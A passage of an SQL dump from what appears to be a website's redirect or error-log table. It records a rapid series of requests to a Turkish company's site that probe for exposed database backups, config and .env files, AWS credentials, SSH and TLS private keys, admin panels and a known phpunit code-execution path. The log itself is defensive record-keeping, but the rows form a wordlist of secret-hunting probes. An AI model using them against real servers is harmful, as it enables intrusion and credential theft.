00:00:00',301),(62651,'https://www.3s-technologies.com.tr/en/wp-content/uploads/db.sql',NULL,'','',1,0,'2026-04-12 10:45:25','0000-00-00 00:00:00',301),(62652,'https://www.3s-technologies.com.tr/en/wp-content/uploads/mysql.sql',NULL,'','',1,0,'2026-04-12 10:45:26','0000-00-00 00:00:00',301),(62653,'https://www.3s-technologies.com.tr/en/wp-content/backup/db.sql',NULL,'','',1,0,'2026-04-12 10:45:26','0000-00-00 00:00:00',301),(62654,'https://www.3s-technologies.com.tr/en/wp-content/backups/db.sql',NULL,'','',1,0,'2026-04-12 10:45:27','0000-00-00 00:00:00',301),(62655,'https://www.3s-technologies.com.tr/en/wp-content/db_backup.sql',NULL,'','',1,0,'2026-04-12 10:45:27','0000-00-00 00:00:00',301),(62656,'https://www.3s-technologies.com.tr/en/wp-content/uploads/db_backup.sql',NULL,'','',1,0,'2026-04-12 10:45:28','0000-00-00 00:00:00',301),(62657,'https://www.3s-technologies.com.tr/en/wp-content/backup/db_backup.sql',NULL,'','',1,0,'2026-04-12 10:45:28','0000-00-00 00:00:00',301),(62658,'https://www.3s-technologies.com.tr/en/wp-content/fullbackup.sql',NULL,'','',1,0,'2026-04-12 10:45:29','0000-00-00 00:00:00',301),(62659,'https://www.3s-technologies.com.tr/en/wp-content/fullwebsite.sql',NULL,'','',1,0,'2026-04-12 10:45:29','0000-00-00 00:00:00',301),(62660,'https://www.3s-technologies.com.tr/en/wp-content/data.sql',NULL,'','',1,0,'2026-04-12 10:45:30','0000-00-00 00:00:00',301),(62661,'https://www.3s-technologies.com.tr/en/wp-content/backup/data.sql',NULL,'','',1,0,'2026-04-12 10:45:30','0000-00-00 00:00:00',301),(62662,'https://www.3s-technologies.com.tr/en/wp-content/uploads/data.sql',NULL,'','',1,0,'2026-04-12 10:45:31','0000-00-00 00:00:00',301),(62663,'https://www.3s-technologies.com.tr/en/wp-content/backups/data.sql',NULL,'','',1,0,'2026-04-12 10:45:32','0000-00-00 00:00:00',301),(62664,'https://www.3s-technologies.com.tr/en/wp-content/backup/database.sql',NULL,'','',1,0,'2026-04-12 10:45:32','0000-00-00 00:00:00',301),(62665,'https://www.3s-technologies.com.tr/en/wp-content/backups/database.sql',NULL,'','',1,0,'2026-04-12 10:45:33','0000-00-00 00:00:00',301),(62666,'https://www.3s-technologies.com.tr/en/wp-content/wordpress.sql',NULL,'','',1,0,'2026-04-12 10:45:33','0000-00-00 00:00:00',301),(62667,'https://www.3s-technologies.com.tr/en/wp-content/backups/wordpress.sql',NULL,'','',1,0,'2026-04-12 10:45:34','0000-00-00 00:00:00',301),(62668,'https://www.3s-technologies.com.tr/en/wp-content/dbdump.sql',NULL,'','',1,0,'2026-04-12 10:45:34','0000-00-00 00:00:00',301),(62669,'https://www.3s-technologies.com.tr/en/wp-content/uploads/dbdump.sql',NULL,'','',1,0,'2026-04-12 10:45:34','0000-00-00 00:00:00',301),(62670,'https://www.3s-technologies.com.tr/en/wp-content/backups/dbdump.sql',NULL,'','',1,0,'2026-04-12 10:45:35','0000-00-00 00:00:00',301),(62671,'https://www.3s-technologies.com.tr/en/wp-content/backup/dbdump.sql',NULL,'','',1,0,'2026-04-12 10:45:35','0000-00-00 00:00:00',301),(62672,'https://www.3s-technologies.com.tr/en/wp-config.bak',NULL,'','',1,0,'2026-04-12 10:45:36','0000-00-00 00:00:00',301),(62673,'https://www.3s-technologies.com.tr/en/wp-config-sample.php.bak',NULL,'','',1,0,'2026-04-12 10:45:36','0000-00-00 00:00:00',301),(62674,'https://www.3s-technologies.com.tr/en/wp-config.php.bak1',NULL,'','',1,0,'2026-04-12 10:45:37','0000-00-00 00:00:00',301),(62675,'https://www.3s-technologies.com.tr/en/wp-config.bak1',NULL,'','',1,0,'2026-04-12 10:45:38','0000-00-00 00:00:00',301),(62676,'https://www.3s-technologies.com.tr/en/config.inc.php.bak',NULL,'','',1,0,'2026-04-12 10:45:38','0000-00-00 00:00:00',301),(62677,'https://www.3s-technologies.com.tr/en/connect.php.bak',NULL,'','',1,0,'2026-04-12 10:45:38','0000-00-00 00:00:00',301),(62678,'https://www.3s-technologies.com.tr/en/connection.php.bak',NULL,'','',1,0,'2026-04-12 10:45:39','0000-00-00 00:00:00',301),(62679,'https://www.3s-technologies.com.tr/en/conn.php.bak',NULL,'','',1,0,'2026-04-12 10:45:39','0000-00-00 00:00:00',301),(62680,'https://www.3s-technologies.com.tr/en/conn.asp.bak',NULL,'','',1,0,'2026-04-12 10:45:40','0000-00-00 00:00:00',301),(62681,'https://www.3s-technologies.com.tr/en/connection.asp.bak',NULL,'','',1,0,'2026-04-12 10:45:40','0000-00-00 00:00:00',301),(62682,'https://www.3s-technologies.com.tr/en/config.jsp.bak',NULL,'','',1,0,'2026-04-12 10:45:41','0000-00-00 00:00:00',301),(62683,'https://www.3s-technologies.com.tr/en/config.ini.bak',NULL,'','',1,0,'2026-04-12 10:45:42','0000-00-00 00:00:00',301),(62684,'https://www.3s-technologies.com.tr/en/config/config.inc.php.bak',NULL,'','',1,0,'2026-04-12 10:45:42','0000-00-00 00:00:00',301),(62685,'https://www.3s-technologies.com.tr/en/config/config_ucenter.php.bak',NULL,'','',1,0,'2026-04-12 10:45:42','0000-00-00 00:00:00',301),(62686,'https://www.3s-technologies.com.tr/en/config/config_global.php.bak',NULL,'','',1,0,'2026-04-12 10:45:43','0000-00-00 00:00:00',301),(62687,'https://www.3s-technologies.com.tr/en/bitrix/php_interface/dbconn.php.bak',NULL,'','',1,0,'2026-04-12 10:45:43','0000-00-00 00:00:00',301),(62688,'https://www.3s-technologies.com.tr/en/uc_server/data/config.inc.php.bak',NULL,'','',1,0,'2026-04-12 10:45:44','0000-00-00 00:00:00',301),(62689,'https://www.3s-technologies.com.tr/en/data/config.inc.php.bak',NULL,'','',1,0,'2026-04-12 10:45:44','0000-00-00 00:00:00',301),(62690,'https://www.3s-technologies.com.tr/en/var/debug.log',NULL,'','',1,0,'2026-04-12 10:45:45','0000-00-00 00:00:00',301),(62691,'https://www.3s-technologies.com.tr/en/content/debug.log',NULL,'','',1,0,'2026-04-12 10:45:45','0000-00-00 00:00:00',301),(62692,'https://www.3s-technologies.com.tr/en/npm-debug.log',NULL,'','',1,0,'2026-04-12 10:45:46','0000-00-00 00:00:00',301),(62693,'https://www.3s-technologies.com.tr/en/yarn-debug.log',NULL,'','',1,0,'2026-04-12 10:45:46','0000-00-00 00:00:00',301),(62694,'https://www.3s-technologies.com.tr/en/firebase-debug.log',NULL,'','',1,0,'2026-04-12 10:45:47','0000-00-00 00:00:00',301),(62695,'https://www.3s-technologies.com.tr/en/debug.txt',NULL,'','',1,0,'2026-04-12 10:45:47','0000-00-00 00:00:00',301),(62696,'https://www.3s-technologies.com.tr/en/debug.txt.gz',NULL,'','',1,0,'2026-04-12 10:45:48','0000-00-00 00:00:00',301),(62697,'https://www.3s-technologies.com.tr/en/debug.tar.gz',NULL,'','',1,0,'2026-04-12 10:45:48','0000-00-00 00:00:00',301),(62698,'https://www.3s-technologies.com.tr/en/debug.zip',NULL,'','',1,0,'2026-04-12 10:45:48','0000-00-00 00:00:00',301),(62699,'https://www.3s-technologies.com.tr/en/debug.sql',NULL,'','',1,0,'2026-04-12 10:45:49','0000-00-00 00:00:00',301),(62700,'https://www.3s-technologies.com.tr/en/debug.sql.tar.gz',NULL,'','',1,0,'2026-04-12 10:45:49','0000-00-00 00:00:00',301),(62701,'https://www.3s-technologies.com.tr/en/debug.sql.zip',NULL,'','',1,0,'2026-04-12 10:45:50','0000-00-00 00:00:00',301),(62702,'https://www.3s-technologies.com.tr/en/mysql_debug.sql',NULL,'','',1,0,'2026-04-12 10:45:51','0000-00-00 00:00:00',301),(62703,'https://www.3s-technologies.com.tr/en/root/.aws/credentials',NULL,'','',1,0,'2026-04-12 10:45:51','0000-00-00 00:00:00',301),(62704,'https://www.3s-technologies.com.tr/en/.aws/secret_access_key.txt',NULL,'','',1,0,'2026-04-12 10:45:52','0000-00-00 00:00:00',301),(62705,'https://www.3s-technologies.com.tr/en/.aws/s3/config.json',NULL,'','',1,0,'2026-04-12 10:45:52','0000-00-00 00:00:00',301),(62706,'https://www.3s-technologies.com.tr/en/.aws/config.yaml',NULL,'','',1,0,'2026-04-12 10:45:53','0000-00-00 00:00:00',301),(62707,'https://www.3s-technologies.com.tr/en/.aws/secrets',NULL,'','',1,0,'2026-04-12 10:45:53','0000-00-00 00:00:00',301),(62708,'https://www.3s-technologies.com.tr/en/.aws/secretsmanager',NULL,'','',1,0,'2026-04-12 10:45:54','0000-00-00 00:00:00',301),(62709,'https://www.3s-technologies.com.tr/en/config.php.old',NULL,'','',1,0,'2026-04-12 10:45:54','0000-00-00 00:00:00',301),(62710,'https://www.3s-technologies.com.tr/en/config.inc.php',NULL,'','',1,0,'2026-04-12 10:45:55','0000-00-00 00:00:00',301),(62711,'https://www.3s-technologies.com.tr/en/config.json.bak',NULL,'','',1,0,'2026-04-12 10:45:55','0000-00-00 00:00:00',301),(62712,'https://www.3s-technologies.com.tr/en/config.yml',NULL,'','',1,0,'2026-04-12 10:45:56','0000-00-00 00:00:00',301),(62713,'https://www.3s-technologies.com.tr/en/config.js.bak',NULL,'','',1,0,'2026-04-12 10:45:56','0000-00-00 00:00:00',301),(62714,'https://www.3s-technologies.com.tr/en/config/settings.local.yml',NULL,'','',1,0,'2026-04-12 10:45:57','0000-00-00 00:00:00',301),(62715,'https://www.3s-technologies.com.tr/en/config.local',NULL,'','',1,0,'2026-04-12 10:45:57','0000-00-00 00:00:00',301),(62716,'https://www.3s-technologies.com.tr/en/config.local.php_old',NULL,'','',1,0,'2026-04-12 10:45:58','0000-00-00 00:00:00',301),(62717,'https://www.3s-technologies.com.tr/en/config.inc',NULL,'','',1,0,'2026-04-12 10:45:58','0000-00-00 00:00:00',301),(62718,'https://www.3s-technologies.com.tr/en/config.properties',NULL,'','',1,0,'2026-04-12 10:45:59','0000-00-00 00:00:00',301),(62719,'https://www.3s-technologies.com.tr/en/appsettings.json',NULL,'','',1,0,'2026-04-12 10:45:59','0000-00-00 00:00:00',301),(62720,'https://www.3s-technologies.com.tr/en/connectionstrings.json',NULL,'','',1,0,'2026-04-12 10:46:00','0000-00-00 00:00:00',301),(62721,'https://www.3s-technologies.com.tr/en/settings.php.bak',NULL,'','',1,0,'2026-04-12 10:46:00','0000-00-00 00:00:00',301),(62722,'https://www.3s-technologies.com.tr/en/settings.php.old',NULL,'','',1,0,'2026-04-12 10:46:01','0000-00-00 00:00:00',301),(62723,'https://www.3s-technologies.com.tr/en/settings.php.save',NULL,'','',1,0,'2026-04-12 10:46:01','0000-00-00 00:00:00',301),(62724,'https://www.3s-technologies.com.tr/en/app/config/parameters.yml',NULL,'','',1,0,'2026-04-12 10:46:02','0000-00-00 00:00:00',301),(62725,'https://www.3s-technologies.com.tr/en/composer.json',NULL,'','',1,0,'2026-04-12 10:46:02','0000-00-00 00:00:00',301),(62726,'https://www.3s-technologies.com.tr/en/package.json',NULL,'','',1,0,'2026-04-12 10:46:02','0000-00-00 00:00:00',301),(62727,'https://www.3s-technologies.com.tr/en/debug.xml',NULL,'','',1,0,'2026-04-12 10:46:03','0000-00-00 00:00:00',301),(62728,'https://www.3s-technologies.com.tr/en/debug-output.txt',NULL,'','',1,0,'2026-04-12 10:46:03','0000-00-00 00:00:00',301),(62729,'https://www.3s-technologies.com.tr/en/php.log',NULL,'','',1,0,'2026-04-12 10:46:04','0000-00-00 00:00:00',301),(62730,'https://www.3s-technologies.com.tr/en/build.log',NULL,'','',1,0,'2026-04-12 10:46:04','0000-00-00 00:00:00',301),(62731,'https://www.3s-technologies.com.tr/en/scripts/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:46:05','0000-00-00 00:00:00',301),(62732,'https://www.3s-technologies.com.tr/en/tmp/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:46:05','0000-00-00 00:00:00',301),(62733,'https://www.3s-technologies.com.tr/en/symfony/_profiler/phpinfo',NULL,'','',1,0,'2026-04-12 10:46:06','0000-00-00 00:00:00',301),(62734,'https://www.3s-technologies.com.tr/en/webdav/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:46:06','0000-00-00 00:00:00',301),(62735,'https://www.3s-technologies.com.tr/en/php-information',NULL,'','',1,0,'2026-04-12 10:46:07','0000-00-00 00:00:00',301),(62736,'https://www.3s-technologies.com.tr/en/tools/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:46:07','0000-00-00 00:00:00',301),(62737,'https://www.3s-technologies.com.tr/en/start.sh',NULL,'','',1,0,'2026-04-12 10:46:08','0000-00-00 00:00:00',301),(62738,'https://www.3s-technologies.com.tr/en/run.sh',NULL,'','',1,0,'2026-04-12 10:46:08','0000-00-00 00:00:00',301),(62739,'https://www.3s-technologies.com.tr/en/build.sh',NULL,'','',1,0,'2026-04-12 10:46:09','0000-00-00 00:00:00',301),(62740,'https://www.3s-technologies.com.tr/en/startup.sh',NULL,'','',1,0,'2026-04-12 10:46:09','0000-00-00 00:00:00',301),(62741,'https://www.3s-technologies.com.tr/en/cron.sh',NULL,'','',1,0,'2026-04-12 10:46:10','0000-00-00 00:00:00',301),(62742,'https://www.3s-technologies.com.tr/en/aws-credentials.sh',NULL,'','',1,0,'2026-04-12 10:46:10','0000-00-00 00:00:00',301),(62743,'https://www.3s-technologies.com.tr/en/configure.sh',NULL,'','',1,0,'2026-04-12 10:46:11','0000-00-00 00:00:00',301),(62744,'https://www.3s-technologies.com.tr/en/service.pwd',NULL,'','',1,0,'2026-04-12 10:46:11','0000-00-00 00:00:00',301),(62745,'https://www.3s-technologies.com.tr/en/service.grp',NULL,'','',1,0,'2026-04-12 10:46:12','0000-00-00 00:00:00',301),(62746,'https://www.3s-technologies.com.tr/en/server.sh',NULL,'','',1,0,'2026-04-12 10:46:12','0000-00-00 00:00:00',301),(62747,'https://www.3s-technologies.com.tr/en/configuration.php.bak',NULL,'','',1,0,'2026-04-12 10:46:13','0000-00-00 00:00:00',301),(62748,'https://www.3s-technologies.com.tr/en/app/etc/local.xml.bak',NULL,'','',1,0,'2026-04-12 10:46:13','0000-00-00 00:00:00',301),(62749,'https://www.3s-technologies.com.tr/en/database.sql',NULL,'','',1,0,'2026-04-12 10:46:14','0000-00-00 00:00:00',301),(62750,'https://www.3s-technologies.com.tr/en/mysql.sql',NULL,'','',1,0,'2026-04-12 10:46:14','0000-00-00 00:00:00',301),(62751,'https://www.3s-technologies.com.tr/en/backup.sql',NULL,'','',1,0,'2026-04-12 10:46:15','0000-00-00 00:00:00',301),(62752,'https://www.3s-technologies.com.tr/en/site.sql',NULL,'','',1,0,'2026-04-12 10:46:15','0000-00-00 00:00:00',301),(62753,'https://www.3s-technologies.com.tr/en/wordpress.sql',NULL,'','',1,0,'2026-04-12 10:46:16','0000-00-00 00:00:00',301),(62754,'https://www.3s-technologies.com.tr/en/server-info.php',NULL,'','',1,0,'2026-04-12 10:46:17','0000-00-00 00:00:00',301),(62755,'https://www.3s-technologies.com.tr/en/app_dev.php/_profiler/open?file=app/config/parameters.yml',NULL,'','',1,0,'2026-04-12 10:46:17','0000-00-00 00:00:00',301),(62756,'https://www.3s-technologies.com.tr/en/storage/oauth-private.key',NULL,'','',1,0,'2026-04-12 10:46:18','0000-00-00 00:00:00',301),(62757,'https://www.3s-technologies.com.tr/en/storage/oauth-public.key',NULL,'','',1,0,'2026-04-12 10:46:18','0000-00-00 00:00:00',301),(62758,'https://www.3s-technologies.com.tr/en/storage/logs/stack.log',NULL,'','',1,0,'2026-04-12 10:46:19','0000-00-00 00:00:00',301),(62759,'https://www.3s-technologies.com.tr/en/storage/debug.log',NULL,'','',1,0,'2026-04-12 10:46:19','0000-00-00 00:00:00',301),(62760,'https://www.3s-technologies.com.tr/en/bootstrap/app.php',NULL,'','',1,0,'2026-04-12 10:46:20','0000-00-00 00:00:00',301),(62761,'https://www.3s-technologies.com.tr/en/config/auth.php',NULL,'','',1,0,'2026-04-12 10:46:21','0000-00-00 00:00:00',301),(62762,'https://www.3s-technologies.com.tr/en/config/filesystems.php',NULL,'','',1,0,'2026-04-12 10:46:21','0000-00-00 00:00:00',301),(62763,'https://www.3s-technologies.com.tr/en/config/queue.php',NULL,'','',1,0,'2026-04-12 10:46:21','0000-00-00 00:00:00',301),(62764,'https://www.3s-technologies.com.tr/en/config/session.php',NULL,'','',1,0,'2026-04-12 10:46:22','0000-00-00 00:00:00',301),(62765,'https://www.3s-technologies.com.tr/en/config/view.php',NULL,'','',1,0,'2026-04-12 10:46:23','0000-00-00 00:00:00',301),(62766,'https://www.3s-technologies.com.tr/en/config/logging.php',NULL,'','',1,0,'2026-04-12 10:46:23','0000-00-00 00:00:00',301),(62767,'https://www.3s-technologies.com.tr/en/config/broadcasting.php',NULL,'','',1,0,'2026-04-12 10:46:24','0000-00-00 00:00:00',301),(62768,'https://www.3s-technologies.com.tr/en/resources/views/errors/500.blade.php',NULL,'','',1,0,'2026-04-12 10:46:24','0000-00-00 00:00:00',301),(62769,'https://www.3s-technologies.com.tr/en/resources/views/errors/404.blade.php',NULL,'','',1,0,'2026-04-12 10:46:25','0000-00-00 00:00:00',301),(62770,'https://www.3s-technologies.com.tr/en/resources/views/welcome.blade.php',NULL,'','',1,0,'2026-04-12 10:46:25','0000-00-00 00:00:00',301),(62771,'https://www.3s-technologies.com.tr/en/_debugbar/open',NULL,'','',1,0,'2026-04-12 10:46:26','0000-00-00 00:00:00',301),(62772,'https://www.3s-technologies.com.tr/en/debugbar',NULL,'','',1,0,'2026-04-12 10:46:26','0000-00-00 00:00:00',301),(62773,'https://www.3s-technologies.com.tr/en/xdebug.php',NULL,'','',1,0,'2026-04-12 10:46:27','0000-00-00 00:00:00',301),(62774,'https://www.3s-technologies.com.tr/en/xdebug_info.php',NULL,'','',1,0,'2026-04-12 10:46:27','0000-00-00 00:00:00',301),(62775,'https://www.3s-technologies.com.tr/en/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2026-04-12 10:46:28','0000-00-00 00:00:00',301),(62776,'https://www.3s-technologies.com.tr/en/vendor/symfony/debug/debug.php',NULL,'','',1,0,'2026-04-12 10:46:28','0000-00-00 00:00:00',301),(62777,'https://www.3s-technologies.com.tr/en/vendor/composer/installed.json',NULL,'','',1,0,'2026-04-12 10:46:29','0000-00-00 00:00:00',301),(62778,'https://www.3s-technologies.com.tr/en/vendor/autoload.php',NULL,'','',1,0,'2026-04-12 10:46:29','0000-00-00 00:00:00',301),(62779,'https://www.3s-technologies.com.tr/en/vendor/.env.example',NULL,'','',1,0,'2026-04-12 10:46:30','0000-00-00 00:00:00',301),(62780,'https://www.3s-technologies.com.tr/en/artisan',NULL,'','',1,0,'2026-04-12 10:46:30','0000-00-00 00:00:00',301),(62781,'https://www.3s-technologies.com.tr/en/test_socket.php',NULL,'','',1,0,'2026-04-12 10:46:31','0000-00-00 00:00:00',301),(62782,'https://www.3s-technologies.com.tr/en/testdb.php',NULL,'','',1,0,'2026-04-12 10:46:31','0000-00-00 00:00:00',301),(62783,'https://www.3s-technologies.com.tr/en/errors.log',NULL,'','',1,0,'2026-04-12 10:46:32','0000-00-00 00:00:00',301),(62784,'https://www.3s-technologies.com.tr/en/config.old',NULL,'','',1,0,'2026-04-12 10:46:32','0000-00-00 00:00:00',301),(62785,'https://www.3s-technologies.com.tr/en/export.sql',NULL,'','',1,0,'2026-04-12 10:46:33','0000-00-00 00:00:00',301),(62786,'https://www.3s-technologies.com.tr/en/adminer-4.2.5-mysql-en.php',NULL,'','',1,0,'2026-04-12 10:46:33','0000-00-00 00:00:00',301),(62787,'https://www.3s-technologies.com.tr/en/phpmyadmin.php',NULL,'','',1,0,'2026-04-12 10:46:34','0000-00-00 00:00:00',301),(62788,'https://www.3s-technologies.com.tr/en/phpmyadmin/index.php',NULL,'','',1,0,'2026-04-12 10:46:34','0000-00-00 00:00:00',301),(62789,'https://www.3s-technologies.com.tr/en/phpmyadmin/setup/index.php',NULL,'','',1,0,'2026-04-12 10:46:35','0000-00-00 00:00:00',301),(62790,'https://www.3s-technologies.com.tr/en/sql.php',NULL,'','',1,0,'2026-04-12 10:46:35','0000-00-00 00:00:00',301),(62791,'https://www.3s-technologies.com.tr/en/sqladmin.php',NULL,'','',1,0,'2026-04-12 10:46:36','0000-00-00 00:00:00',301),(62792,'https://www.3s-technologies.com.tr/en/dbadmin.php',NULL,'','',1,0,'2026-04-12 10:46:36','0000-00-00 00:00:00',301),(62793,'https://www.3s-technologies.com.tr/en/phpminiadmin.php',NULL,'','',1,0,'2026-04-12 10:46:37','0000-00-00 00:00:00',301),(62794,'https://www.3s-technologies.com.tr/en/mysqladmin.php',NULL,'','',1,0,'2026-04-12 10:46:37','0000-00-00 00:00:00',301),(62795,'https://www.3s-technologies.com.tr/en/backup/database.zip',NULL,'','',1,0,'2026-04-12 10:46:38','0000-00-00 00:00:00',301),(62796,'https://www.3s-technologies.com.tr/en/database.zip',NULL,'','',1,0,'2026-04-12 10:46:38','0000-00-00 00:00:00',301),(62797,'https://www.3s-technologies.com.tr/en/dump.tar.gz',NULL,'','',1,0,'2026-04-12 10:46:39','0000-00-00 00:00:00',301),(62798,'https://www.3s-technologies.com.tr/en/data.tar.gz',NULL,'','',1,0,'2026-04-12 10:46:39','0000-00-00 00:00:00',301),(62799,'https://www.3s-technologies.com.tr/en/backup.tar',NULL,'','',1,0,'2026-04-12 10:46:40','0000-00-00 00:00:00',301),(62800,'https://www.3s-technologies.com.tr/en/app.tar.gz',NULL,'','',1,0,'2026-04-12 10:46:40','0000-00-00 00:00:00',301),(62801,'https://www.3s-technologies.com.tr/en/database.tar.gz',NULL,'','',1,0,'2026-04-12 10:46:41','0000-00-00 00:00:00',301),(62802,'https://www.3s-technologies.com.tr/en/db_backup.zip',NULL,'','',1,0,'2026-04-12 10:46:41','0000-00-00 00:00:00',301),(62803,'https://www.3s-technologies.com.tr/en/database_backup.sql',NULL,'','',1,0,'2026-04-12 10:46:42','0000-00-00 00:00:00',301),(62804,'https://www.3s-technologies.com.tr/en/.config/config.json',NULL,'','',1,0,'2026-04-12 10:46:43','0000-00-00 00:00:00',301),(62805,'https://www.3s-technologies.com.tr/en/.docker/config.json',NULL,'','',1,0,'2026-04-12 10:46:43','0000-00-00 00:00:00',301),(62806,'https://www.3s-technologies.com.tr/en/.settings.json',NULL,'','',1,0,'2026-04-12 10:46:44','0000-00-00 00:00:00',301),(62807,'https://www.3s-technologies.com.tr/en/node_modules',NULL,'','',1,0,'2026-04-12 10:46:44','0000-00-00 00:00:00',301),(62808,'https://www.3s-technologies.com.tr/en/vendor',NULL,'','',1,0,'2026-04-12 10:46:45','0000-00-00 00:00:00',301),(62809,'https://www.3s-technologies.com.tr/en/core/config.php',NULL,'','',1,0,'2026-04-12 10:46:45','0000-00-00 00:00:00',301),(62810,'https://www.3s-technologies.com.tr/en/core/config.bak',NULL,'','',1,0,'2026-04-12 10:46:46','0000-00-00 00:00:00',301),(62811,'https://www.3s-technologies.com.tr/en/api/config.json',NULL,'','',1,0,'2026-04-12 10:46:46','0000-00-00 00:00:00',301),(62812,'https://www.3s-technologies.com.tr/en/wp-config-sample.php',NULL,'','',1,0,'2026-04-12 10:46:47','0000-00-00 00:00:00',301),(62813,'https://www.3s-technologies.com.tr/en/wordpress/wp-config.php',NULL,'','',1,0,'2026-04-12 10:46:47','0000-00-00 00:00:00',301),(62814,'https://www.3s-technologies.com.tr/en/wordpress/wp-config-sample.php',NULL,'','',1,0,'2026-04-12 10:46:48','0000-00-00 00:00:00',301),(62815,'https://www.3s-technologies.com.tr/en/.ds_store',NULL,'','',1,0,'2026-04-12 10:46:48','0000-00-00 00:00:00',301),(62816,'https://www.3s-technologies.com.tr/en/.bash_history',NULL,'','',1,0,'2026-04-12 10:46:49','0000-00-00 00:00:00',301),(62817,'https://www.3s-technologies.com.tr/en/.bashrc',NULL,'','',1,0,'2026-04-12 10:46:50','0000-00-00 00:00:00',301),(62818,'https://www.3s-technologies.com.tr/en/id_rsa',NULL,'','',1,0,'2026-04-12 10:46:50','0000-00-00 00:00:00',301),(62819,'https://www.3s-technologies.com.tr/en/id_rsa.pub',NULL,'','',1,0,'2026-04-12 10:46:51','0000-00-00 00:00:00',301),(62820,'https://www.3s-technologies.com.tr/en/key.pem',NULL,'','',1,0,'2026-04-12 10:46:51','0000-00-00 00:00:00',301),(62821,'https://www.3s-technologies.com.tr/en/public.key',NULL,'','',1,0,'2026-04-12 10:46:52','0000-00-00 00:00:00',301),(62822,'https://www.3s-technologies.com.tr/en/ssl.key',NULL,'','',1,0,'2026-04-12 10:46:52','0000-00-00 00:00:00',301),(62823,'https://www.3s-technologies.com.tr/en/cert.pem',NULL,'','',1,0,'2026-04-12 10:46:55','0000-00-00 00:00:00',301),(62824,'https://www.3s-technologies.com.tr/en/selfsigned.crt',NULL,'','',1,0,'2026-04-12 10:46:55','0000-00-00 00:00:00',301),(62825,'https://www.3s-technologies.com.tr/en/selfsigned.key',NULL,'','',1,0,'2026-04-12 10:46:56','0000-00-00 00:00:00',301),(62826,'https://www.3s-technologies.com.tr/en/nginx.conf',NULL,'','',1,0,'2026-04-12 10:46:57','0000-00-00 00:00:00',301),(62827,'https://www.3s-technologies.com.tr/en/httpd.conf',NULL,'','',1,0,'2026-04-12 10:46:57','0000-00-00 00:00:00',301),(62828,'https://www.3s-technologies.com.tr/en/docker-compose.override.yml',NULL,'','',1,0,'2026-04-12 10:46:58','0000-00-00 00:00:00',301),(62829,'https://www.3s-technologies.com.tr/en/dockerfile',NULL,'','',1,0,'2026-04-12 10:46:58','0000-00-00 00:00:00',301),(62830,'https://www.3s-technologies.com.tr/en/.nvmrc',NULL,'','',1,0,'2026-04-12 10:46:59','0000-00-00 00:00:00',301),(62831,'https://www.3s-technologies.com.tr/en/.yarnrc',NULL,'','',1,0,'2026-04-12 10:46:59','0000-00-00 00:00:00',301),(62832,'https://www.3s-technologies.com.tr/en/.rbenv-vars',NULL,'','',1,0,'2026-04-12 10:47:00','0000-00-00 00:00:00',301),(62833,'https://www.3s-technologies.com.tr/en/config.ts',NULL,'','',1,0,'2026-04-12 10:47:00','0000-00-00 00:00:00',301),(62834,'https://www.3s-technologies.com.tr/en/env.ts',NULL,'','',1,0,'2026-04-12 10:47:01','0000-00-00 00:00:00',301),(62835,'https://www.3s-technologies.com.tr/en/settings.ini',NULL,'','',1,0,'2026-04-12 10:47:02','0000-00-00 00:00:00',301),(62836,'https://www.3s-technologies.com.tr/en/web.xml',NULL,'','',1,0,'2026-04-12 10:47:02','0000-00-00 00:00:00',301),(62837,'https://www.3s-technologies.com.tr/en/web-inf/web.xml',NULL,'','',1,0,'2026-04-12 10:47:03','0000-00-00 00:00:00',301),(62838,'https://www.3s-technologies.com.tr/en/meta-inf/context.xml',NULL,'','',1,0,'2026-04-12 10:47:03','0000-00-00 00:00:00',301),(62839,'https://www.3s-technologies.com.tr/en/admin/settings.php',NULL,'','',1,0,'2026-04-12 10:47:04','0000-00-00 00:00:00',301),(62840,'https://www.3s-technologies.com.tr/en/admin/settings.ini',NULL,'','',1,0,'2026-04-12 10:47:04','0000-00-00 00:00:00',301),(62841,'https://www.3s-technologies.com.tr/en/admin/db.php',NULL,'','',1,0,'2026-04-12 10:47:05','0000-00-00 00:00:00',301),(62842,'https://www.3s-technologies.com.tr/en/admin/db.conf',NULL,'','',1,0,'2026-04-12 10:47:06','0000-00-00 00:00:00',301),(62843,'https://www.3s-technologies.com.tr/en/admin/sql.conf',NULL,'','',1,0,'2026-04-12 10:47:06','0000-00-00 00:00:00',301),(62844,'https://www.3s-technologies.com.tr/en/admin/.env.bak',NULL,'','',1,0,'2026-04-12 10:47:07','0000-00-00 00:00:00',301),(62845,'https://www.3s-technologies.com.tr/en/admin/adminer.php',NULL,'','',1,0,'2026-04-12 10:47:07','0000-00-00 00:00:00',301),(62846,'https://www.3s-technologies.com.tr/en/admin/sqladmin.php',NULL,'','',1,0,'2026-04-12 10:47:08','0000-00-00 00:00:00',301),(62847,'https://www.3s-technologies.com.tr/en/admin/phpmyadmin.php',NULL,'','',1,0,'2026-04-12 10:47:08','0000-00-00 00:00:00',301),(62848,'https://www.3s-technologies.com.tr/en/private/secret.key',NULL,'','',1,0,'2026-04-12 10:47:09','0000-00-00 00:00:00',301),(62849,'https://www.3s-technologies.com.tr/en/private/secret.txt',NULL,'','',1,0,'2026-04-12 10:47:09','0000-00-00 00:00:00',301),(62850,'https://www.3s-technologies.com.tr/en/secrets.txt',NULL,'','',1,0,'2026-04-12 10:47:10','0000-00-00 00:00:00',301),(62851,'https://www.3s-technologies.com.tr/en/secrets.env',NULL,'','',1,0,'2026-04-12 10:47:11','0000-00-00 00:00:00',301),(62852,'https://www.3s-technologies.com.tr/en/secret.env',NULL,'','',1,0,'2026-04-12 10:47:11','0000-00-00 00:00:00',301),(62853,'https://www.3s-technologies.com.tr/en/api/secrets.json',NULL,'','',1,0,'2026-04-12 10:47:12','0000-00-00 00:00:00',301),(62854,'https://www.3s-technologies.com.tr/en/.well-known/.env',NULL,'','',1,0,'2026-04-12 10:47:12','0000-00-00 00:00:00',301),(62855,'https://www.3s-technologies.com.tr/en/.well-known/config.json',NULL,'','',1,0,'2026-04-12 10:47:13','0000-00-00 00:00:00',301),(62856,'https://www.3s-technologies.com.tr/en/.well-known/credentials.json',NULL,'','',1,0,'2026-04-12 10:47:13','0000-00-00 00:00:00',301),(62857,'https://www.3s-technologies.com.tr/en/install.php',NULL,'','',1,0,'2026-04-12 10:47:14','0000-00-00 00:00:00',301),(62858,'https://www.3s-technologies.com.tr/en/setup.php',NULL,'','',1,0,'2026-04-12 10:47:15','0000-00-00 